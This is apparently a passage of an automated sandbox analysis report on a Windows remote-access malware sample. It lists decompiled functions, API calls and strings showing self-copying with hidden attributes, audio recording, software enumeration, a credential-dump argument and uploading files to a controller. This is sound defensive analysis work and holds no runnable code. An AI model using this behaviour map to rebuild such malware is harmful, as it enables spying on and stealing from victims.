                                    • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                    • CloseHandle.KERNEL32(00000000), ref: 00412576
                                    • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                    • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                    • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                      • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                    • Sleep.KERNEL32(000001F4), ref: 004126BD
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                    • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                    • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                    • String ID: .exe$8SG$WDH$exepath$open$temp_
                                    • API String ID: 2649220323-436679193
                                    • Opcode ID: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                    • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                    • Opcode Fuzzy Hash: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                    • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                    Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                    • SetEvent.KERNEL32 ref: 0041B2AA
                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                    • CloseHandle.KERNEL32 ref: 0041B2CB
                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                    • API String ID: 738084811-2094122233
                                    • Opcode ID: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                    • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                    • Opcode Fuzzy Hash: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                    • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                    Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                    • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                    • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                    • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Write$Create
                                    • String ID: RIFF$WAVE$data$fmt
                                    • API String ID: 1602526932-4212202414
                                    • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                    • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                    • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                    • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                    Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\keHuNxIumw.exe,00000001,00407688,C:\Users\user\AppData\Roaming\keHuNxIumw.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                    • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                    • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: C:\Users\user\AppData\Roaming\keHuNxIumw.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                    • API String ID: 1646373207-598482349
                                    • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                    • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                    • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                    • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                    Function 0040CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 0040CE42
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                    • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\keHuNxIumw.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                    • _wcslen.LIBCMT ref: 0040CF21
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                    • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\keHuNxIumw.exe,00000000,00000000), ref: 0040CFBF
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                    • _wcslen.LIBCMT ref: 0040D001
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                    • ExitProcess.KERNEL32 ref: 0040D09D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                    • String ID: 6$C:\Users\user\AppData\Roaming\keHuNxIumw.exe$del$open
                                    • API String ID: 1579085052-236192539
                                    • Opcode ID: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                    • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                    • Opcode Fuzzy Hash: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                    • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                    Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                    • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                    • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                    • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                    • _wcslen.LIBCMT ref: 0041C1CC
                                    • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                    • GetLastError.KERNEL32 ref: 0041C204
                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                    • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                    • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                    • GetLastError.KERNEL32 ref: 0041C261
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                    • String ID: ?
                                    • API String ID: 3941738427-1684325040
                                    • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                    • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                    • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                    • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                    Function 00414DC1 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                    • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                    • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                    • String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                    • API String ID: 2490988753-3346362794
                                    • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                    • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                    • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                    • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                    Function 0044F4AD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$EnvironmentVariable$_wcschr
                                    • String ID:
                                    • API String ID: 3899193279-0
                                    • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                    • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                    • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                    • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                    Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                      • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                      • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                      • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                    • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                    • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                    • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                    • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                    • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                    • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                    • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                    • Sleep.KERNEL32(00000064), ref: 00412ECF
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                    • String ID: /stext "$0TG$0TG$NG$NG
                                    • API String ID: 1223786279-2576077980
                                    • Opcode ID: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                    • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                    • Opcode Fuzzy Hash: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                    • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                    Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                    • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                    • API String ID: 1332880857-3714951968
                                    • Opcode ID: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                    • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                    • Opcode Fuzzy Hash: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                    • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                    Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                    • GetCursorPos.USER32(?), ref: 0041D67A
                                    • SetForegroundWindow.USER32(?), ref: 0041D683
                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                    • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                    • ExitProcess.KERNEL32 ref: 0041D6F6
                                    • CreatePopupMenu.USER32 ref: 0041D6FC
                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                    • String ID: Close
                                    • API String ID: 1657328048-3535843008
                                    • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                    • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                    • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                    • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                    Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$Info
                                    • String ID:
                                    • API String ID: 2509303402-0
                                    • Opcode ID: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                    • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                    • Opcode Fuzzy Hash: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                    • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                    Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                    • __aulldiv.LIBCMT ref: 00408D88
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                    • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                    • CloseHandle.KERNEL32(00000000), ref: 00409037
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                    • API String ID: 3086580692-2582957567
                                    • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                    • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                    • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                    • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                    Function 0040A761 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00001388), ref: 0040A77B
                                      • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                      • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                      • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                      • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                      • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                    • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                    • API String ID: 3795512280-1152054767
                                    • Opcode ID: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                    • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                    • Opcode Fuzzy Hash: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                    • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                    Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • connect.WS2_32(?,?,?), ref: 004048E0
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                    • WSAGetLastError.WS2_32 ref: 00404A21
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                    • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                    • API String ID: 994465650-3229884001
                                    • Opcode ID: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                    • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                    • Opcode Fuzzy Hash: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                    • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                    Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0045138A
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                    • _free.LIBCMT ref: 0045137F
